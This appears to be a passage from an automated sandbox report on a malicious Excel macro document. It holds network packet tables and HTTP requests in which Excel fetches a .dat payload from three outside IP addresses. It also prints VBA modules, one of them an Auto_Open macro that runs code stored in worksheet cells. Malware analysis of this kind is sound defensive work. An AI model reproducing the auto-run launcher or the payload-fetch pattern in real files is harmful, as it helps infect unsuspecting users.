May 4, 2021 19:16:15.942538023 CEST  49719        80         192.168.2.3     51.89.73.159
May 4, 2021 19:16:15.943131924 CEST  49719        80         192.168.2.3     51.89.73.159
May 4, 2021 19:16:15.986170053 CEST  80           49719      51.89.73.159    192.168.2.3
May 4, 2021 19:16:16.118751049 CEST  80           49719      51.89.73.159    192.168.2.3
May 4, 2021 19:16:16.119505882 CEST  49719        80         192.168.2.3     51.89.73.159
May 4, 2021 19:16:16.131661892 CEST  49721        80         192.168.2.3     190.14.37.38
May 4, 2021 19:16:16.347027063 CEST  80           49721      190.14.37.38    192.168.2.3
May 4, 2021 19:16:16.347218037 CEST  49721        80         192.168.2.3     190.14.37.38
May 4, 2021 19:16:16.392647982 CEST  49721        80         192.168.2.3     190.14.37.38
May 4, 2021 19:16:16.608597040 CEST  80           49721      190.14.37.38    192.168.2.3
May 4, 2021 19:16:17.242520094 CEST  80           49721      190.14.37.38    192.168.2.3
May 4, 2021 19:16:17.242721081 CEST  49721        80         192.168.2.3     190.14.37.38
May 4, 2021 19:17:20.891457081 CEST  80           49718      185.183.99.115  192.168.2.3
May 4, 2021 19:17:20.891556025 CEST  49718        80         192.168.2.3     185.183.99.115
May 4, 2021 19:17:21.120646000 CEST  80           49719      51.89.73.159    192.168.2.3
May 4, 2021 19:17:21.120784044 CEST  49719        80         192.168.2.3     51.89.73.159
May 4, 2021 19:17:22.243406057 CEST  80           49721      190.14.37.38    192.168.2.3
May 4, 2021 19:17:22.243510962 CEST  49721        80         192.168.2.3     190.14.37.38
May 4, 2021 19:17:55.149754047 CEST  49721        80         192.168.2.3     190.14.37.38
May 4, 2021 19:17:55.150881052 CEST  49719        80         192.168.2.3     51.89.73.159
May 4, 2021 19:17:55.151318073 CEST  49718        80         192.168.2.3     185.183.99.115
May 4, 2021 19:17:55.198422909 CEST  80           49719      51.89.73.159    192.168.2.3
May 4, 2021 19:17:55.219871998 CEST  80           49718      185.183.99.115  192.168.2.3
May 4, 2021 19:17:55.355443954 CEST  80           49721      190.14.37.38    192.168.2.3

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
May 4, 2021 19:15:51.934272051 CEST  60152        53         192.168.2.3  8.8.8.8
May 4, 2021 19:15:51.982973099 CEST  53           60152      8.8.8.8      192.168.2.3
May 4, 2021 19:15:53.063707113 CEST  57544        53         192.168.2.3  8.8.8.8
May 4, 2021 19:15:53.112313986 CEST  53           57544      8.8.8.8      192.168.2.3
May 4, 2021 19:15:53.176804066 CEST  55984        53         192.168.2.3  8.8.8.8
May 4, 2021 19:15:53.235790968 CEST  53           55984      8.8.8.8      192.168.2.3
May 4, 2021 19:15:54.307302952 CEST  64185        53         192.168.2.3  8.8.8.8
May 4, 2021 19:15:54.358922958 CEST  53           64185      8.8.8.8      192.168.2.3
May 4, 2021 19:15:55.568938017 CEST  65110        53         192.168.2.3  8.8.8.8
May 4, 2021 19:15:55.617638111 CEST  53           65110      8.8.8.8      192.168.2.3
May 4, 2021 19:15:56.694853067 CEST  58361        53         192.168.2.3  8.8.8.8
May 4, 2021 19:15:56.743637085 CEST  53           58361      8.8.8.8      192.168.2.3
May 4, 2021 19:15:58.049340963 CEST  63492        53         192.168.2.3  8.8.8.8
May 4, 2021 19:15:58.098414898 CEST  53           63492      8.8.8.8      192.168.2.3
May 4, 2021 19:16:04.118915081 CEST  60831        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:04.167423010 CEST  53           60831      8.8.8.8      192.168.2.3
May 4, 2021 19:16:05.248944998 CEST  60100        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:05.313146114 CEST  53           60100      8.8.8.8      192.168.2.3
May 4, 2021 19:16:05.769292116 CEST  53195        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:05.828942060 CEST  53           53195      8.8.8.8      192.168.2.3
May 4, 2021 19:16:06.780545950 CEST  53195        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:06.924063921 CEST  53           53195      8.8.8.8      192.168.2.3
May 4, 2021 19:16:07.441859007 CEST  50141        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:07.493766069 CEST  53           50141      8.8.8.8      192.168.2.3
May 4, 2021 19:16:07.796130896 CEST  53195        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:07.853513956 CEST  53           53195      8.8.8.8      192.168.2.3
May 4, 2021 19:16:08.912045002 CEST  53023        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:08.960794926 CEST  53           53023      8.8.8.8      192.168.2.3
May 4, 2021 19:16:09.796406031 CEST  53195        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:09.853488922 CEST  53           53195      8.8.8.8      192.168.2.3
May 4, 2021 19:16:10.818454981 CEST  49563        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:10.870151043 CEST  53           49563      8.8.8.8      192.168.2.3
May 4, 2021 19:16:13.382998943 CEST  51352        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:13.434859037 CEST  53           51352      8.8.8.8      192.168.2.3
May 4, 2021 19:16:13.812894106 CEST  53195        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:13.861574888 CEST  53           53195      8.8.8.8      192.168.2.3
May 4, 2021 19:16:16.063263893 CEST  59349        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:16.112044096 CEST  53           59349      8.8.8.8      192.168.2.3
May 4, 2021 19:16:19.542145967 CEST  57084        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:19.591221094 CEST  53           57084      8.8.8.8      192.168.2.3
May 4, 2021 19:16:21.390675068 CEST  58823        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:21.439693928 CEST  53           58823      8.8.8.8      192.168.2.3
May 4, 2021 19:16:22.321969032 CEST  57568        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:22.372649908 CEST  53           57568      8.8.8.8      192.168.2.3
May 4, 2021 19:16:23.209453106 CEST  50540        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:23.258133888 CEST  53           50540      8.8.8.8      192.168.2.3
May 4, 2021 19:16:24.233088970 CEST  54366        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:24.281788111 CEST  53           54366      8.8.8.8      192.168.2.3
May 4, 2021 19:16:24.592925072 CEST  53034        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:24.680562973 CEST  53           53034      8.8.8.8      192.168.2.3
May 4, 2021 19:16:25.326855898 CEST  57762        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:25.378506899 CEST  53           57762      8.8.8.8      192.168.2.3
May 4, 2021 19:16:29.000226021 CEST  55435        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:29.048978090 CEST  53           55435      8.8.8.8      192.168.2.3
May 4, 2021 19:16:36.594240904 CEST  50713        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:36.659069061 CEST  53           50713      8.8.8.8      192.168.2.3
May 4, 2021 19:16:47.753575087 CEST  56132        53         192.168.2.3  8.8.8.8
May 4, 2021 19:16:47.805176020 CEST  53           56132      8.8.8.8      192.168.2.3
May 4, 2021 19:17:07.289597988 CEST  58987        53         192.168.2.3  8.8.8.8
May 4, 2021 19:17:07.338356972 CEST  53           58987      8.8.8.8      192.168.2.3
May 4, 2021 19:17:11.463778019 CEST  56579        53         192.168.2.3  8.8.8.8
May 4, 2021 19:17:11.522720098 CEST  53           56579      8.8.8.8      192.168.2.3
May 4, 2021 19:17:30.145167112 CEST  60633        53         192.168.2.3  8.8.8.8
May 4, 2021 19:17:30.202497959 CEST  53           60633      8.8.8.8      192.168.2.3
May 4, 2021 19:17:45.067238092 CEST  61292        53         192.168.2.3  8.8.8.8
May 4, 2021 19:17:45.118760109 CEST  53           61292      8.8.8.8      192.168.2.3
May 4, 2021 19:17:46.952163935 CEST  63619        53         192.168.2.3  8.8.8.8
May 4, 2021 19:17:47.001286030 CEST  53           63619      8.8.8.8      192.168.2.3

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 185.183.99.115
                                                                                                                                                • 51.89.73.159
                                                                                                                                                • 190.14.37.38

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.3  49718        185.183.99.115  80                C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp                            kBytes transferred  Direction  Data
May 4, 2021 19:16:15.623878956 CEST  1277                OUT        GET /44313,6048108796.dat HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.183.99.115
Connection: Keep-Alive
May 4, 2021 19:16:15.891493082 CEST  1278                IN         HTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:16:18 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.3  49719        51.89.73.159    80                C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp                            kBytes transferred  Direction  Data
May 4, 2021 19:16:15.943131924 CEST  1278                OUT        GET /44313,6048108796.dat HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 51.89.73.159
Connection: Keep-Alive
May 4, 2021 19:16:16.118751049 CEST  1279                IN         HTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:12:46 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                 Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49721 | Destination IP: 190.14.37.38 | Destination Port: 80 | Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                 May 4, 2021 19:16:16.392647982 CEST | 1280 | OUT | GET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 190.14.37.38
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                 May 4, 2021 19:16:17.242520094 CEST | 1285 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:16:17 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage


                                                                                                                                                Memory Usage


                                                                                                                                                High Level Behavior Distribution


                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:19:16:03
                                                                                                                                                Start date:04/05/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0xb70000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Call Graph

                                                                                                                                                Graph

                                                                                                                                                callgraph 2 Auto_Open Run:3,Range:3

                                                                                                                                                Module: Blasr

                                                                                                                                                Declaration
                                                                                                                                                 Line | Content
                                                                                                                                                 1 | Attribute VB_Name = "Blasr"

                                                                                                                                                Executed Functions
                                                                                                                                                 APIs | Meta Information
                                                                                                                                                 Run | Microsoft Excel:Application.Run()
                                                                                                                                                 Range
                                                                                                                                                 Run
                                                                                                                                                 Range
                                                                                                                                                 Run
                                                                                                                                                 Range

                                                                                                                                                 Strings | Decrypted Strings
                                                                                                                                                "AJ6"
                                                                                                                                                "Nyukasl"
                                                                                                                                                "A5"
                                                                                                                                                "Nyukasl"
                                                                                                                                                "A5"
                                                                                                                                                "Nyukasl"
                                                                                                                                                 Line | Instruction | Meta Information
                                                                                                                                                 2 | Private Sub Auto_Open()
                                                                                                                                                 3 | Application.Run Sheets("Nyukasl").Range("AJ6") | Microsoft Excel:Application.Run(), Range, executed
                                                                                                                                                 5 | Application.Run Sheets("Nyukasl").Range("A5") | Run, Range
                                                                                                                                                 6 | Application.Run Sheets("Nyukasl").Range("A5") | Run, Range
                                                                                                                                                 13 | End Sub

                                                                                                                                                Module: Briks

                                                                                                                                                Declaration
                                                                                                                                                 Line | Content
                                                                                                                                                 1 | Attribute VB_Name = "Briks"
                                                                                                                                                 2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                 3 | Attribute VB_GlobalNameSpace = False
                                                                                                                                                 4 | Attribute VB_Creatable = False
                                                                                                                                                 5 | Attribute VB_PredeclaredId = True
                                                                                                                                                 6 | Attribute VB_Exposed = True
                                                                                                                                                 7 | Attribute VB_TemplateDerived = False
                                                                                                                                                 8 | Attribute VB_Customizable = True

                                                                                                                                                Module: Byutut

                                                                                                                                                Declaration
                                                                                                                                                 Line | Content
                                                                                                                                                 1 | Attribute VB_Name = "Byutut"

                                                                                                                                                Module: Class1

                                                                                                                                                Declaration
                                                                                                                                                 Line | Content
                                                                                                                                                 1 | Attribute VB_Name = "Class1"
                                                                                                                                                 2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                 3 | Attribute VB_GlobalNameSpace = False
                                                                                                                                                 4 | Attribute VB_Creatable = False
                                                                                                                                                 5 | Attribute VB_PredeclaredId = False
                                                                                                                                                 6 | Attribute VB_Exposed = False
                                                                                                                                                 7 | Attribute VB_TemplateDerived = False
                                                                                                                                                 8 | Attribute VB_Customizable = False

                                                                                                                                                Module: Class2

                                                                                                                                                Declaration
                                                                                                                                                 Line | Content
                                                                                                                                                 1 | Attribute VB_Name = "Class2"
                                                                                                                                                 2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                 3 | Attribute VB_GlobalNameSpace = False
                                                                                                                                                 4 | Attribute VB_Creatable = False
                                                                                                                                                 5 | Attribute VB_PredeclaredId = False
                                                                                                                                                 6 | Attribute VB_Exposed = False
                                                                                                                                                 7 | Attribute VB_TemplateDerived = False
                                                                                                                                                 8 | Attribute VB_Customizable = False

                                                                                                                                                Module: Class3

                                                                                                                                                Declaration
                                                                                                                                                 Line | Content
                                                                                                                                                 1 | Attribute VB_Name = "Class3"
                                                                                                                                                 2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                 3 | Attribute VB_GlobalNameSpace = False
                                                                                                                                                 4 | Attribute VB_Creatable = False
                                                                                                                                                 5 | Attribute VB_PredeclaredId = False
                                                                                                                                                 6 | Attribute VB_Exposed = False
                                                                                                                                                 7 | Attribute VB_TemplateDerived = False
                                                                                                                                                 8 | Attribute VB_Customizable = False

                                                                                                                                                Module: Kikide

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Kikide"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = True

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                Module: UserForm1

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "UserForm1"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = False

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = False

                                                                                                                                                Module: Vrest

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Vrest"

                                                                                                                                                Module: Vsewd

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Vsewd"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = True

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = True
